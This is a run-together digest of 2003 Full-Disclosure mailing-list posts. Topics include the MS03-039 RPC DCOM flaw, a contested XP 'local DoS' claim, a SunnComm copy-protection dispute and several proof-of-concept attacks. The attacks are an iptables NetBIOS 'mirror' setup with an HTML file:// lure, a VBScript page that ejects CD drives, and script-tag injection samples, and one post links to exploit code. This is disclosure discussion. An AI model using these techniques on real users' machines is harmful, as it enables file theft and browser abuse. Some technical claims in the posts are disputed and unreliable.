So I can assume no other information is posted, other than this site, to collaborate the RPC issue is not resolved or should we all try to translate this site using the helpful hints, which they are? BB -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of petard Sent: Friday, October 10, 2003 4:40 PM To: Brown, Bobby (US - Hermitage) Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability On Fri, Oct 10, 2003 at 03:34:04PM -0400, Brown, Bobby (US - Hermitage) wrote: For us that can not interpret the site, what more information can be provided. Bobby FYI, the site is in Russian. Here are the steps for enlightening yourself: 1. Visit your favorite search engine. 2. Type the words online translator russian (without quotation marks) into the query field. 3. Visit one of the many free or paid translating services that are listed there. 4. Select your preferred language (English, I'd wager), enter the URL, and let the translator go to work. 5. Read the slightly stilted but informative result. FWIW, entering that query into google and clicking I'm feeling lucky gives good results. Good luck. HTH, petard -- If your message really might be confidential, download my PGP key here: http://petard.freeshell.org/petard.asc and encrypt it. Otherwise, save bandwidth and lose the disclaimer. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Signed e-mail vs. turning off HTML mail under XP
yossarian wrote: The problem is that by turning off HTML for e-mail as a security measure, you disable the correct use of digitally signed e-mail, which by design is a security measure. Not the case, AFAIK -- S/MIME doesn't depend on how you view the document. At least w/Mozilla (currently in use here) S/MIME signatures are verified even though the HTML is not rendered. -- Well, Brahma said, even after ten thousand explanations, a fool is no wiser, but an intelligent man requires only two thousand five hundred. - The Mahabharata ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
If this is at all really a new version of the rpc exploit that presents the attacker with the holy grail, then it is probably as bad as others have suggested. I haven't tested yet. But one thing I'd do is go through all of my windows systems and turned the RPC service off. Patching is one thing, but if you don't need the service, turn it off. On Out! On Fri, 2003-10-10 at 20:05, Bobby Brown wrote: So I can assume no other information is posted, other than this site, to collaborate the RPC issue is not resolved or should we all try to translate this site using the helpful hints, which they are? BB -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] Behalf Of petard Sent: Friday, October 10, 2003 4:40 PM To: Brown, Bobby (US - Hermitage) Cc: [EMAIL PROTECTED] Subject: Re: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability On Fri, Oct 10, 2003 at 03:34:04PM -0400, Brown, Bobby (US - Hermitage) wrote: For us that can not interpret the site, what more information can be provided. Bobby FYI, the site is in Russian. Here are the steps for enlightening yourself: 1. Visit your favorite search engine. 2. Type the words online translator russian (without quotation marks) into the query field. 3. Visit one of the many free or paid translating services that are listed there. 4. Select your preferred language (English, I'd wager), enter the URL, and let the translator go to work. 5. Read the slightly stilted but informative result. FWIW, entering that query into google and clicking I'm feeling lucky gives good results. Good luck. HTH, petard -- If your message really might be confidential, download my PGP key here: http://petard.freeshell.org/petard.asc and encrypt it. Otherwise, save bandwidth and lose the disclaimer. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Local DoS in windows. [finally...]
Ok i have to admit! i use windows xp pro and it does work we have tried it in other hardware platforms and it does work there too... but surprisingly! we got positive/negative results from all round the world!!! can be, it works on a particular hardware type and doesn't .. in some other -- --- Cael Abal [EMAIL PROTECTED] wrote: Steve Wray wrote: How long do you have to hold the mouse button down for? I see no effect after about 30 seconds then I got bored... Tried in outlook and wordpad. In fact the 'ambient' CPU useage actually appeared to flatten out. Seems to me that users of FD and bugtraq have just been social engineered into wasting a couple man-hours 'testing' for this XP bug. Not quite Scaggs-worthy, granted, but it did manage to tie up Steve for half a minute. :) Cael ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html __ Do you Yahoo!? The New Yahoo! Shopping - with improved product search http://shopping.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Local DoS in windows.
well... that works on mine! and the computer that i have tested it on! ARE YOU USING WINDOWS XP PRO??? well... in 2-3 sec and you contniously click the button HELL IT WORK! YOU AREN'T A MICROSOFT EMPLOYEE ... ARE YOU??? --- Steve Wray [EMAIL PROTECTED] wrote: How long do you have to hold the mouse button down for? I see no effect after about 30 seconds then I got bored... Tried in outlook and wordpad. In fact the 'ambient' CPU useage actually appeared to flatten out. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of bipin gautam Sent: Saturday, 11 October 2003 6:18 a.m. To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Subject: [Full-Disclosure] Local DoS in windows. --- [Affected] --- We have only tried it in windows Xp. --- [Bug Details] --- http://www.geocities.com/visitbipin/win_dos.jpg The image is self explanatory... --- [Description] --- When you click to any close, maximize or minimize button's in windows Xp, [No matter whether it's IE or a WordPad] surprisingly there is 100% CPU use at the instant and it continues until you release the button! Moreover, we've noticed if you continuously click the button for a long time [... not release it and hold ON ] we've seen gradual/slow rise in page-file use too...!!! --- [Conclusion] --- Hell... local DoS! That could be used by employees working at different terminal. (O; --- [Background Information] --- This bug was originally discovered by hUNT3R,[myself] a member of 01 Security Submission. The vendor was notified via email. http://www.ysgnet.com/hn ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html __ Do you Yahoo!? The New Yahoo! Shopping - with improved product search http://shopping.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] [A bug!] Whom to blame, the HTML interpreter or the JavaScript compiler?
fine! i am stupid then! you will regret those words when you are using my exploit's to . hell search google! you will find a lot! http://www.google.com.np/search?q=%22bipin+gautam%22+hUNT3Rie=UTF-8oe=UTF-8hl=nebtnG=%E0%A4%97%E0%A5%81%E0%A4%97%E0%A4%B2+%E0%A4%96%E0%A5%8B%E0%A4%9C%E0%A5%80 YOU THINK I AM STUPID CAUZ I COULDN'T EXPLAIN YOU WHAT I MEAN!!! - --- bipin gautam [EMAIL PROTECTED] wrote: well... i've PERSONALLY tried it with IE 6 AND Opera 7.11 and MOZILLa... for windows! well... for the other statistic i've been reported by friends/people like you! it does work! -- --- Florian Huber [EMAIL PROTECTED] wrote: On Fri, 10 Oct 2003 10:38:59 -0700 (PDT) bipin gautam [EMAIL PROTECTED] wrote: --- [Effected] --- It's spelled affected ;P All versions of OPERA, MOZILLA and INTERNET EXPLORER available up to this, relese DATE! Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.5a) Gecko/20030813 Mozilla Firebird/0.6.1 Definitely _not_ vulnerable... ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html __ Do you Yahoo!? The New Yahoo! Shopping - with improved product search http://shopping.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html __ Do you Yahoo!? The New Yahoo! Shopping - with improved product search http://shopping.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
Exploit code can be found here: http://www.securitylab.ru/40754.html This code work with all security fixes. It's very dangerous. - Original Message - From: 3APA3A [EMAIL PROTECTED] To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Sent: Friday, October 10, 2003 6:48 PM Subject: Bad news on RPC DCOM vulnerability Dear [EMAIL PROTECTED], There are few bad news on RPC DCOM vulnerability: 1. Universal exploit for MS03-039 exists in-the-wild, PINK FLOYD is again actual. 2. It was reported by exploit author (and confirmed), Windows XP SP1 with all security fixes installed still vulnerable to variant of the same bug. Windows 2000/2003 was not tested. For a while only DoS exploit exists, but code execution is probably possible. Technical details are sent to Microsoft, waiting for confirmation. Dear ISPs. Please instruct you customers to use personal fireWALL in Windows XP. -- http://www.security.nnov.ru /\_/\ { , . } |\ +--oQQo-{ ^ }-+ \ | ZARAZA U 3APA3A } +-o66o--+ / |/ You know my name - look up my number (The Beatles) ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] [A bug! update...] Whom to blame, the HTML interpreter or the JavaScript compiler?
This is the code you send html body pTHIS IS hUNT3R aka:Bipin Gautam, exploit revised by Cyberdude/p script document.write(bhUNTER Cyberdude/b/scriptscriptalert(it works 1); alert(This works 2); /script /body /html this gives an Unterminated string constant error followed by 2 alerts, which is exactly what it should do 1. scriptdocument.write(bhUNTER Cyberdude/b/script this gives the unterminated string constant, your simply not closing your string, bhUNTER Cyberdude never gets written out 2. scriptalert(it works 1); alert(This works 2); /script This is perfectly valid and thus executes I really dont see what your trying to do or what the threat would be when you got whatever your trying to do to work --jelmer - Original Message - From: bipin gautam [EMAIL PROTECTED] To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Sent: Friday, October 10, 2003 7:16 PM Subject: [Full-Disclosure] [A bug! update...] Whom to blame, the HTML interpreter or the JavaScript compiler? --- [Effected] --- All versions of OPERA, MOZILLA and INTERNET EXPLORER available up to this, relese DATE! --- [Proof of concept] --- We have made a small script. Check it out, http://www.cyberdude.com.np/javascript.htm --- [Bug Details] --- html body pTHIS IS hUNT3R aka: Bipin Gautam/p scriptalert(scriptlocation.href=http://www.ysgnet.com;/script)/scr ipt /body /html html body pTHIS IS hUNT3R aka:Bipin Gautam, exploit revised by Cyberdude/p script document.write(bhUNTER Cyberdude/b/scriptscriptalert(it works 1); alert(This works 2); /script /body /html * --[Description]--- The browser is letting you compile some-thing inside the alert function. Well, its should show it anyways without compiling the script tag as it is inside the quotation. But surprising, the output is different! We found JavaScript compiler choked when we use the script tag inside a function like alert(); this also proves to be true for document.write(); function. This means that this script is going to choke bad and you wont get any output but just the ); that's all. This script is working. Its not that it is not working. It works in the starting script tag but when the html parses the script tag inside the document.write it goes mad coz nested scripting is not possible in HTML, the only nested tag in HTML must be the table tag, so in this script the HTML interpreter goes mad. but we can still insert the java script in it. What we did was, we inserted the closing tag of JavaScript /script first closing the script tag that was opened already. After that we added the new starting script tag and wrote two alert tags now... So this is how we injected two alert tags in the java script. --- [Conclusion] --- This proves injection of JavaScript inside a JavaScript making it available to use the current variable and change some static values predefined and even access other function without a problem. This was just a small demo; we use this simple script to just stop it from printing garbage on the screen. --- [Background Information] --- This bug was originally discovered by hUNT3R,[myself] a member of 01 Security Submission. I would like to thank my friend 'Cyberdude' for further exploring it and taking it to a new Level. http://www.ysgnet.com/hn ---[I want a JOB/scholarship... anyone??? - hUNT3R]--- __ Do you Yahoo!? The New Yahoo! Shopping - with improved product search http://shopping.yahoo.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Student faces suit over key to CD locks
You may write to prez of SunnNNNcoM Peter Piper picked a peck of pickled peppers here: [EMAIL PROTECTED] or view his gibberish under a woefully insecure flash infested website here: http://www.sunncomm.com/asktheprez/asktheprez.asp Peter has addressed a carefully selected question about hacking and answered it like security is a barbie doll, a plaything. Perhaps Peter should not be in the security field judging by his childlike attitude, the miserably cartoonish website of his company and the simple fact that his entursted chore of creating copy-protection mechansims can be defeated by simply holding down a KEY. I would suggest whoever has commissioned or contracted him to produce this farcical product, immediately penalise not only this pathetic company but also him personally as an officer pathetic company. Peter - you have insulted the entire security community with such a ridiculous product. Kindly refrain from entering this field and stick to something else. As a security guru, a multi-billionaire and a fund manager for a top 10 prime bank, I shall be instructing my people to downgrade your stock as a result of all of this. I am now even embarrassed to call me peter Peter. Shame on you! Q: I´ve heard your technology can be hacked. Does that mean it won´t work? (10/6/2003 7:37:18 PM) A: Not at all. People who perform tests on MediaMax and declare it to be hackable don´t understand why it´s there in the first place. Let me tell you why: 1. All technology can be hacked by people wishing to make illegal and unauthorized use of the content owners´ property. Prior to MediaMax, there was no alternative to the illegal copying and re-copying of music by users. Now with MediaMax on the CD, honest people have a way of honoring the artist´s wishes regarding how and where the music property can be copied and shared. 2. MediaMax was designed to put a structure on the CD, itself, that empowers consumers to make licensed, legal and yes, limited copies of the music. The world has never seen anything like it before. 3. Thieves attempting to circumvent the technology for the purpose of re-distributing the music are breaking the law. Nothing will ever stop these thieves. They´ve rationalized the theft and they will always be looking for ways to cheat the system. 4. The goal of MediaMax was not to invent the holy grail (since one does not exist). The idea was to provide users with a way to legally use the CD, whether that be for copying or sharing the music. The difference between using our implanted technology or ripping the music for re-distribution is the difference between withdrawing money from your bank or robbing it. 5. If you owned technology that allowed you to transport the money from your local bank to your living room, doesn´t give you the right to do it. Music is much the same. As a consumer, you purchase the listening rights to the music on the CD, not the duplication rights. 6. No matter how much stealing (called sharing to make thieves feel better about themselves)goes on, it´s still taking the copyrighted property of others and converting it to one´s own use. 7. The current version of MediaMax is like any software technology in Version 1. The next version will make it tougher and tougher to circumvent. We have to start somewhere and progressive record companies like BMG and others understand this. 8. Meanwhile, honest people, may, for the first time, enjoy the pleasurable experience of legal and licensed copying and sharing of their music - that´s about 95% of us. That´s who we designed MediaMax for. 9. So-called experts who grandstand by publishing MediaMax hacks don´t get it. They seem to born out of some Messiah complex hell-bent on saving the world from any technological attempt to protect artists and their property. It´s as though they think that music is different from other real property. It isn´t, and the people who subvert the protection that is afforded by MediaMax, no matter how trivial they deem that protection to be, are conspiring to commit theft against the wishes of the artists who created the musical property. 10. With MediaMax, we have a technology that plays on virtually every device and allows both copying and sharing, yet some think our technology is worthless based on how easy or hard it is to steal and convert the music property. It´s as though they think that honest people will always steal if there´s a way to get away with it. Hackers think circumventing protection technologies is a game. It´s not. It´s a crime. I´m going to predict they´ve all got a wake-up call coming. -- This is how we, a bunch of musicians and artists (and, yes, business people) at SunnComm feel about what we do. Thanks for writing, Peter Concerned about your privacy? Follow this link to get FREE encrypted email: https://www.hushmail.com/?l=2 Free, ultra-private instant messaging with Hush Messenger https://www.hushmail.com/services.php?subloc=messengerl=434
[Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
If I am reading this correctly in the sense is it being stated that with all patches and hotfixes systems are still vulnerabile to some form of the RPC exploit as it relates to ms039? Thanks! Stone 3APA3A [EMAIL PROTECTED]To: [EMAIL PROTECTED], [EMAIL PROTECTED], NNOV.RU [EMAIL PROTECTED] cc: [EMAIL PROTECTED] 10/10/2003 10:48 Subject: Bad news on RPC DCOM vulnerability AM Please respond to 3APA3A Dear [EMAIL PROTECTED], There are few bad news on RPC DCOM vulnerability: 1. Universal exploit for MS03-039 exists in-the-wild, PINK FLOYD is again actual. 2. It was reported by exploit author (and confirmed), Windows XP SP1 with all security fixes installed still vulnerable to variant of the same bug. Windows 2000/2003 was not tested. For a while only DoS exploit exists, but code execution is probably possible. Technical details are sent to Microsoft, waiting for confirmation. Dear ISPs. Please instruct you customers to use personal fireWALL in Windows XP. -- http://www.security.nnov.ru /\_/\ { , . } |\ +--oQQo-{ ^ }-+ \ | ZARAZA U 3APA3A } +-o66o--+ / |/ You know my name - look up my number (The Beatles) ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Mirror attacks on windows clients
Hi all, Last night I was debguging a netbios connection between two machines and I remembered of something real simple and stupid. I can't recall of reading anything on the subject but fact is i didn't do any kind of research, so sorry if this is a known issue. Mirroring Netbios connections from windows clients. Lacking a better term, I'm calling this mirror because the idea is to put a windows client talking Netbios with him self. I've prepared a simple iptables based firewall on a linux box, so that beeing 10.10.10.1 the firewall external interface and 10.10.10.2 the windows client, this simple rules apply(may wrap): -A PREROUTING -t nat -s 10.10.10.2 -d 10.10.10.1 -p tcp -m tcp --dport 139 -j DNAT --to-destination 10.10.10.2:139 -A POSTROUTING -o eth0 -j MASQUERADE Basically, what this does (obviously) is mirror the connections to port 139 of the firewall from the windows client to that same port on the windows client, causing it in fact to be talking Netbios with him self. The Netbios connection is established and authenticated successfully, wich allows me to sniff on the (unencrypted) traffic on the linux box. So, If the user on the windows workstation visits a web page on my linux box that has (for example) IMG SRC=file://10.10.10.1/c$/boot.ini he will in fact be reading his own boot.ini, and will be able to read it also by dumping the port 139 traffic on my firewall. Now, this sonds really simple and stupid, and of course there's a strong possibility that I'm looking at this from a totally wrong perspective, if so I am sorry, but doesn't this look like it allows me to send a html mail to 1 windows/outlook users and use this to read arbitrary files on their workstations ( either by looking at the traffic, or coding a simple program that parses the netbios traffic)? Best regards, Joao Gouveia [EMAIL PROTECTED] signature.asc Description: This is a digitally signed message part
RE: [Full-Disclosure] Student faces suit over key to CD locks
It has now been drawn to my attention that Peter has 'backed down' from the lawsuit. I fear that it is too late for that dear Peter. A an officer of a public company it is unacceptable to throw around 'willy-nilly' lawsuits at whim. This affects not only the integrity of the company that you steer but also causes grave concern to the editors of leading internet publications. I am some articles ABOUT your proposed lawsuit are now only propagating through the media wires. To have you suddenly reverse this within hours is most selfish and all reporters will now have to scramble to fix the miss your whim has created. My suggestion now is two-fold - 1. you relenquish your stewardship immediately, you are not fit to run the ship any longer - 2. failing that we shall endeavour to purchase sufficient shares in the operation to toss you 'willy-nilly' by your ear, out the door. This is not the way we conduct corporate busines in this day and age, you have sullied your company's already less than glistening reputation and made a mockery of both the security industry and the judicial system to which we only turn to as a last resort. My decision is final. On Fri, 10 Oct 2003 09:58:32 -0700 [EMAIL PROTECTED] wrote: You may write to prez of SunnNNNcoM Peter Piper picked a peck of pickled peppers here: [EMAIL PROTECTED] or view his gibberish under a woefully insecure flash infested website here: http://www.sunncomm.com/asktheprez/asktheprez.asp Peter has addressed a carefully selected question about hacking and answered it like security is a barbie doll, a plaything. Perhaps Peter should not be in the security field judging by his childlike attitude, the miserably cartoonish website of his company and the simple fact that his entursted chore of creating copy-protection mechansims can be defeated by simply holding down a KEY. I would suggest whoever has commissioned or contracted him to produce this farcical product, immediately penalise not only this pathetic company but also him personally as an officer pathetic company. Peter - you have insulted the entire security community with such a ridiculous product. Kindly refrain from entering this field and stick to something else. As a security guru, a multi-billionaire and a fund manager for a top 10 prime bank, I shall be instructing my people to downgrade your stock as a result of all of this. I am now even embarrassed to call me peter Peter. Shame on you! Q: I´ve heard your technology can be hacked. Does that mean it won´t work? (10/6/2003 7:37:18 PM) A: Not at all. People who perform tests on MediaMax and declare it to be hackable don´t understand why it´s there in the first place. Let me tell you why: 1. All technology can be hacked by people wishing to make illegal and unauthorized use of the content owners´ property. Prior to MediaMax, there was no alternative to the illegal copying and re-copying of music by users. Now with MediaMax on the CD, honest people have a way of honoring the artist´s wishes regarding how and where the music property can be copied and shared. 2. MediaMax was designed to put a structure on the CD, itself, that empowers consumers to make licensed, legal and yes, limited copies of the music. The world has never seen anything like it before. 3. Thieves attempting to circumvent the technology for the purpose of re-distributing the music are breaking the law. Nothing will ever stop these thieves. They´ve rationalized the theft and they will always be looking for ways to cheat the system. 4. The goal of MediaMax was not to invent the holy grail (since one does not exist). The idea was to provide users with a way to legally use the CD, whether that be for copying or sharing the music. The difference between using our implanted technology or ripping the music for re-distribution is the difference between withdrawing money from your bank or robbing it. 5. If you owned technology that allowed you to transport the money from your local bank to your living room, doesn´t give you the right to do it. Music is much the same. As a consumer, you purchase the listening rights to the music on the CD, not the duplication rights. 6. No matter how much stealing (called sharing to make thieves feel better about themselves)goes on, it´s still taking the copyrighted property of others and converting it to one´s own use. 7. The current version of MediaMax is like any software technology in Version 1. The next version will make it tougher and tougher to circumvent. We have to start somewhere and progressive record companies like BMG and others understand this. 8. Meanwhile, honest people, may, for the first time, enjoy the pleasurable experience of legal and licensed copying and sharing of their music - that´s about 95% of us. That´s who we designed MediaMax for. 9. So-called experts who grandstand by publishing MediaMax hacks don´t get it. They seem to born out of some Messiah complex hell-bent on saving the world from any
RE: [Full-Disclosure] Local DoS in windows.
How long do you have to hold the mouse button down for? I see no effect after about 30 seconds then I got bored... Tried in outlook and wordpad. In fact the 'ambient' CPU useage actually appeared to flatten out. -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of bipin gautam Sent: Saturday, 11 October 2003 6:18 a.m. To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Subject: [Full-Disclosure] Local DoS in windows. --- [Affected] --- We have only tried it in windows Xp. --- [Bug Details] --- http://www.geocities.com/visitbipin/win_dos.jpg The image is self explanatory... --- [Description] --- When you click to any close, maximize or minimize button's in windows Xp, [No matter whether it's IE or a WordPad] surprisingly there is 100% CPU use at the instant and it continues until you release the button! Moreover, we've noticed if you continuously click the button for a long time [... not release it and hold ON ] we've seen gradual/slow rise in page-file use too...!!! --- [Conclusion] --- Hell... local DoS! That could be used by employees working at different terminal. (O; --- [Background Information] --- This bug was originally discovered by hUNT3R,[myself] a member of 01 Security Submission. The vendor was notified via email. http://www.ysgnet.com/hn ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
For us that can not interpret the site, what more information can be provided. Bobby -Original Message- From: Alex [mailto:[EMAIL PROTECTED] Sent: Friday, October 10, 2003 1:09 PM To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Subject: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability Exploit code can be found here: http://www.securitylab.ru/40754.html This code work with all security fixes. It's very dangerous. - Original Message - From: 3APA3A [EMAIL PROTECTED] To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Sent: Friday, October 10, 2003 6:48 PM Subject: Bad news on RPC DCOM vulnerability Dear [EMAIL PROTECTED], There are few bad news on RPC DCOM vulnerability: 1. Universal exploit for MS03-039 exists in-the-wild, PINK FLOYD is again actual. 2. It was reported by exploit author (and confirmed), Windows XP SP1 with all security fixes installed still vulnerable to variant of the same bug. Windows 2000/2003 was not tested. For a while only DoS exploit exists, but code execution is probably possible. Technical details are sent to Microsoft, waiting for confirmation. Dear ISPs. Please instruct you customers to use personal fireWALL in Windows XP. -- http://www.security.nnov.ru /\_/\ { , . } |\ +--oQQo-{ ^ }-+ \ | ZARAZA U 3APA3A } +-o66o--+ / |/ You know my name - look up my number (The Beatles) ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html This message (including any attachments) contains confidential information intended for a specific individual and purpose, and is protected by law. If you are not the intended recipient, you should delete this message. Any disclosure, copying, or distribution of this message, or the taking of any action based on it, is strictly prohibited. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability
For non-Russian speakers use http://babelfish.altavista.com/ -- Macroscape Solutions Inc. information technology foresight http://www.macroscape.com -- -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Brown, Bobby (US - Hermitage) Sent: Friday, October 10, 2003 3:34 PM To: 'Alex'; [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability For us that can not interpret the site, what more information can be provided. Bobby -Original Message- From: Alex [mailto:[EMAIL PROTECTED] Sent: Friday, October 10, 2003 1:09 PM To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Subject: [Full-Disclosure] Re: Bad news on RPC DCOM vulnerability Exploit code can be found here: http://www.securitylab.ru/40754.html This code work with all security fixes. It's very dangerous. - Original Message - From: 3APA3A [EMAIL PROTECTED] To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Sent: Friday, October 10, 2003 6:48 PM Subject: Bad news on RPC DCOM vulnerability Dear [EMAIL PROTECTED], There are few bad news on RPC DCOM vulnerability: 1. Universal exploit for MS03-039 exists in-the-wild, PINK FLOYD is again actual. 2. It was reported by exploit author (and confirmed), Windows XP SP1 with all security fixes installed still vulnerable to variant of the same bug. Windows 2000/2003 was not tested. For a while only DoS exploit exists, but code execution is probably possible. Technical details are sent to Microsoft, waiting for confirmation. Dear ISPs. Please instruct you customers to use personal fireWALL in Windows XP. -- http://www.security.nnov.ru /\_/\ { , . } |\ +--oQQo-{ ^ }-+ \ | ZARAZA U 3APA3A } +-o66o--+ / |/ You know my name - look up my number (The Beatles) ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html This message (including any attachments) contains confidential information intended for a specific individual and purpose, and is protected by law. If you are not the intended recipient, you should delete this message. Any disclosure, copying, or distribution of this message, or the taking of any action based on it, is strictly prohibited. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ** CRM114 Whitelisted by: securityfocus.com ** ** ACCEPT: CRM114 Whitelisted by: securityfocus.com ** ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Ejecting CDs with VBScript ( Online Exploit )
Hi friends, I'm not very happy with this , i have done an online test for eject cds in a MS Internet Explorer and i have tested it in all the computers of my house but i was surprised when i checked that the last version of MSIE allows the execution of the script in the following sec. zones: . LOCAL/INTRANET . REMOTE/INTERNET I tested it in default values and the exploit is executed , i edited the values and again it was executed. Am i discovering a new vulnerability in MS Internet Explorer ? I'm not sure because there are lots of known holes in MSIE. Suggestions and help is completely welcome. The best regards, PS: This is the code of the exploit: - SCRIPT LANGUAGE=VBSCRIPT rem -- rem No Secure Root Group Security Research remCoder: Trulux / Lorenzo Hdez G-H rem -- remhttp://www.nsrg-security.com rem -- rem - CREATE WINDOWS MEDIA PLAYER OBJECT rem - Set LARRYINTHEWILD = CreateObject(WMPlayer.OCX.7 ) rem - rem - SETTING SOME VARIABLES FOR EJECT CD UNITS rem - Set RIAAsaysBLAH = LARRYINTHEWILD.cdromCollection rem - rem - EJECTING ROUTINE rem - if RIAAsaysBLAH.Count = 1 then For i = 0 to RIAAsaysBLAH.Count - 1 RIAAsaysBLAH.Item(i).Eject Next ' cdrom End If rem - END /SCRIPT -- NOTE: i don't know if this is a known security hole , if this was discovered before , i'm sorry ( and a little sad :-( ). you can test it online: http://test-zone.nsrg-security.com/browser/msie/cdrom ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Excuse me , oh no! it was discovered before....;-(
Hi again dear friends, I'm a little sad about this: the vulnerability was discovered before , i made a little research in the wmplayer ocx and i saw it but i didn't imagine the possibility that it was discovered before. But , why it is not patched ? if you set the counter to lots of times... it is not a funny joke. the best regards, --- 0x00-Lorenzo Hernandez Garcia-Hierro 0x01-Security Consultant __ PGP: Keyfingerprint B6D7 5FCC 78B4 97C1 4010 56BC 0E5F 2AB2 ID: 0x9C38E1D7 ** No Secure Root Group Security Research Team http://www.nsrg-security.com __ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Ejecting CDs with VBScript ( Online Exploit )
they fixed it with MS03-021 alongside some other issues http://archives.neohapsis.com/archives/fulldisclosure/2003-q2/1765.html - Original Message - From: Lorenzo Hernandez Garcia-Hierro [EMAIL PROTECTED] To: [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Sent: Friday, October 10, 2003 11:12 PM Subject: [Full-Disclosure] Ejecting CDs with VBScript ( Online Exploit ) Hi friends, I'm not very happy with this , i have done an online test for eject cds in a MS Internet Explorer and i have tested it in all the computers of my house but i was surprised when i checked that the last version of MSIE allows the execution of the script in the following sec. zones: . LOCAL/INTRANET . REMOTE/INTERNET I tested it in default values and the exploit is executed , i edited the values and again it was executed. Am i discovering a new vulnerability in MS Internet Explorer ? I'm not sure because there are lots of known holes in MSIE. Suggestions and help is completely welcome. The best regards, PS: This is the code of the exploit: - SCRIPT LANGUAGE=VBSCRIPT rem -- rem No Secure Root Group Security Research remCoder: Trulux / Lorenzo Hdez G-H rem -- remhttp://www.nsrg-security.com rem -- rem - CREATE WINDOWS MEDIA PLAYER OBJECT rem - Set LARRYINTHEWILD = CreateObject(WMPlayer.OCX.7 ) rem - rem - SETTING SOME VARIABLES FOR EJECT CD UNITS rem - Set RIAAsaysBLAH = LARRYINTHEWILD.cdromCollection rem - rem - EJECTING ROUTINE rem - if RIAAsaysBLAH.Count = 1 then For i = 0 to RIAAsaysBLAH.Count - 1 RIAAsaysBLAH.Item(i).Eject Next ' cdrom End If rem - END /SCRIPT -- NOTE: i don't know if this is a known security hole , if this was discovered before , i'm sorry ( and a little sad :-( ). you can test it online: http://test-zone.nsrg-security.com/browser/msie/cdrom ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Bad news on RPC DCOM vulnerability
